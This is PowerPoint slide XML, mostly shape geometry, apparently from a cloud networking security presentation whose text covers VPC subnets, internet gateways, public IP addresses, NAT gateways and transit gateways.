              <a:pathLst>
                <a:path w="1711959" h="1064259">
                  <a:moveTo>
                    <a:pt x="1711452" y="662939"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="1063752"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="399414"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711452" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1711452" y="66293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668256" y="5846064"/>
              <a:ext cx="3423285" cy="807720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3423284" h="807720">
                  <a:moveTo>
                    <a:pt x="1713865" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="400431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="408559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1710563" y="807719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3422904" y="408559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3422904" y="400431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1713865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668256" y="5846064"/>
              <a:ext cx="3423285" cy="807720"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="3423284" h="807720">
                  <a:moveTo>
                    <a:pt x="3422904" y="408559"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1710563" y="807719"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="408559"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="400431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1713865" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3422904" y="400431"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3422904" y="40855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854690" y="5180838"/>
              <a:ext cx="1051560" cy="1074420"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1051559" h="1074420">
                  <a:moveTo>
                    <a:pt x="525779" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="477931" y="2195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431285" y="8655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386027" y="19191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342341" y="33611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300415" y="51727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260434" y="73349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222584" y="98287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187050" y="126351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154019" y="157352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123676" y="191101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96206" y="227406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71797" y="266079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50633" y="306929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32900" y="349768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18785" y="394405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8472" y="440651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2149" y="488316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="537210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2149" y="586103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8472" y="633768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18785" y="680014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32900" y="724651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50633" y="767490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71797" y="808340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96206" y="847013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123676" y="883318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154019" y="917067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187050" y="948068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222584" y="976132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260434" y="1001070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300415" y="1022692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342341" y="1040808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386027" y="1055228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431285" y="1065764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477931" y="1072224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525779" y="1074420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573628" y="1072224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620274" y="1065764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665532" y="1055228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709218" y="1040808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751144" y="1022692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791125" y="1001070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828975" y="976132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864509" y="948068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="897540" y="917067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927883" y="883318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955353" y="847013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979762" y="808340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000926" y="767490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018659" y="724651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1032774" y="680014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1043087" y="633768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049410" y="586103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051559" y="537210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049410" y="488316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1043087" y="440651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1032774" y="394405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018659" y="349768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000926" y="306929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979762" y="266079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955353" y="227406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927883" y="191101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="897540" y="157353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864509" y="126351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828975" y="98287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791125" y="73349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751144" y="51727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709218" y="33611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665532" y="19191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620274" y="8655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573628" y="2195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525779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0854690" y="5180838"/>
              <a:ext cx="1051560" cy="1074420"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1051559" h="1074420">
                  <a:moveTo>
                    <a:pt x="0" y="537210"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="2149" y="488316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8472" y="440651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18785" y="394405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32900" y="349768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50633" y="306929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71797" y="266079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96206" y="227406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123676" y="191101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154019" y="157352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187050" y="126351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222584" y="98287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260434" y="73349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300415" y="51727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342341" y="33611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386027" y="19191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431285" y="8655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477931" y="2195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525779" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573628" y="2195"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620274" y="8655"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665532" y="19191"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709218" y="33611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751144" y="51727"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791125" y="73349"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828975" y="98287"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864509" y="126351"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="897540" y="157353"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927883" y="191101"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955353" y="227406"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979762" y="266079"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000926" y="306929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018659" y="349768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1032774" y="394405"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1043087" y="440651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049410" y="488316"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1051559" y="537210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1049410" y="586103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1043087" y="633768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1032774" y="680014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1018659" y="724651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1000926" y="767490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="979762" y="808340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="955353" y="847013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="927883" y="883318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="897540" y="917067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864509" y="948068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="828975" y="976132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="791125" y="1001070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751144" y="1022692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="709218" y="1040808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="665532" y="1055228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="620274" y="1065764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="573628" y="1072224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="525779" y="1074420"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="477931" y="1072224"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431285" y="1065764"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="386027" y="1055228"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="342341" y="1040808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="300415" y="1022692"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="260434" y="1001070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="222584" y="976132"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="187050" y="948068"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="154019" y="917067"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="123676" y="883318"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="96206" y="847013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71797" y="808340"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50633" y="767490"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="32900" y="724651"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="18785" y="680014"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="8472" y="633768"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2149" y="586103"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="537210"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="25400">
              <a:solidFill>
                <a:srgbClr val="F8DEC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11288394" y="5523992"/>
            <a:ext cx="18542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40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070098" y="3968648"/>
            <a:ext cx="3573779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46175" marR="5080" indent="-1134110">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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segmente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vir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ual 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networks.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435465" y="3982618"/>
            <a:ext cx="3989070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45819" marR="5080" indent="-833755">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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ca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cont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m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ltip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IPv4 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IPv6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subnets.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40400" y="306451"/>
            <a:ext cx="477456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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Cloud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150">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Networking</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-105">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="75">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Security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95804" y="1780793"/>
            <a:ext cx="11895455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Subnets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within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VPC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private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public.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external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connectivity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subnet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endParaRPr sz="2200">
              <a:latin typeface="Lucida Sans Unicode"/>
              <a:cs typeface="Lucida Sans Unicode"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr algn="ctr" marL="233045">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
            </a:pP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provisioned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by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following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ways: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90515" y="760476"/>
            <a:ext cx="6516624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479291" y="3252215"/>
            <a:ext cx="10820400" cy="1388745"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10820400" h="1388745">
                <a:moveTo>
                  <a:pt x="0" y="231394"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4702" y="184769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18188" y="141339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39527" y="102034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67786" y="67786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102034" y="39527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141339" y="18188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184769" y="4702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231394" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10589006" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10635630" y="4702"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10679060" y="18188"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10718365" y="39527"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10752613" y="67786"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10780872" y="102034"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10802211" y="141339"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10815697" y="184769"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10820400" y="231394"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10820400" y="1156970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10815697" y="1203594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10802211" y="1247024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10780872" y="1286329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10752613" y="1320577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10718365" y="1348836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10679060" y="1370175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10635630" y="1383661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10589006" y="1388364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="231394" y="1388364"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="184769" y="1383661"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="141339" y="1370175"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102034" y="1348836"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="67786" y="1320577"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39527" y="1286329"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18188" y="1247024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4702" y="1203594"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1156970"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="231394"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12700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382261" y="3512313"/>
            <a:ext cx="9542780" cy="79057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70"/>
              </a:spcBef>
            </a:pP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configure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public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subnets,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user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must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first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connect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Internet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gateway</a:t>
            </a:r>
            <a:endParaRPr sz="2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(virtual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uter)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VP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settin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conf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it.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79291" y="4953000"/>
            <a:ext cx="10820400" cy="1396365"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10820400" h="1396364">
                <a:moveTo>
                  <a:pt x="0" y="232663"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4725" y="185766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18280" y="142089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39728" y="102567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68135" y="68135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102567" y="39728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142089" y="18280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185766" y="4725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="232663" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10587736" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10634633" y="4725"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10678310" y="18280"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10717832" y="39728"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10752264" y="68135"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10780671" y="102567"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10802119" y="142089"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10815674" y="185766"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10820400" y="232663"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10820400" y="1163320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10815674" y="1210217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10802119" y="1253894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10780671" y="1293416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10752264" y="1327848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10717832" y="1356255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10678310" y="1377703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10634633" y="1391258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10587736" y="1395983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="232663" y="1395983"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="185766" y="1391258"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="142089" y="1377703"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="102567" y="1356255"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="68135" y="1327848"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="39728" y="1293416"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="18280" y="1253894"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4725" y="1210217"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1163320"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="232663"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12700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549902" y="5456682"/>
            <a:ext cx="920496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Public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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>IP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addresses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must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configured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each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instance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subnet.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79291" y="6665976"/>
            <a:ext cx="10820400" cy="1329055"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="10820400" h="1329054">
                <a:moveTo>
                  <a:pt x="0" y="221487"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="4500" y="176857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17408" y="135284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37832" y="97662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64881" y="64881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97662" y="37832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135284" y="17408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176857" y="4500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221487" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10598912" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10643542" y="4500"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10685115" y="17408"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10722737" y="37832"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10755518" y="64881"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10782567" y="97662"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10802991" y="135284"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10815899" y="176857"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10820400" y="221487"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10820400" y="1107440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10815899" y="1152074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10802991" y="1193648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10782567" y="1231271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10755518" y="1264051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10722737" y="1291098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10685115" y="1311520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10643542" y="1324427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10598912" y="1328928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="221487" y="1328928"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="176857" y="1324427"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="135284" y="1311520"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="97662" y="1291098"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="64881" y="1264051"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="37832" y="1231271"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="17408" y="1193648"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4500" y="1152074"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="1107440"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="221487"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:ln w="12700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341114" y="6896887"/>
            <a:ext cx="9620250" cy="7912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325620" marR="5080" indent="-4313555">
              <a:lnSpc>
                <a:spcPct val="114199"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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NAT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gateway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VPN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used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provision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external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connectivity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subnet.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51888" y="3567684"/>
            <a:ext cx="900684" cy="90068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51888" y="5234940"/>
            <a:ext cx="900684" cy="90068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51888" y="6813804"/>
            <a:ext cx="900684" cy="900684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17540" y="306451"/>
            <a:ext cx="481901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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>VPCs</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-114">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="175">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>and</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-135">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="90">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Transit</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="140">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Gateways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8908" y="760476"/>
            <a:ext cx="6480047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821560" y="2982848"/>
            <a:ext cx="12563475" cy="1569085"/>
            <a:chOff x="1821560" y="2982848"/>
            <a:chExt cx="12563475" cy="1569085"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
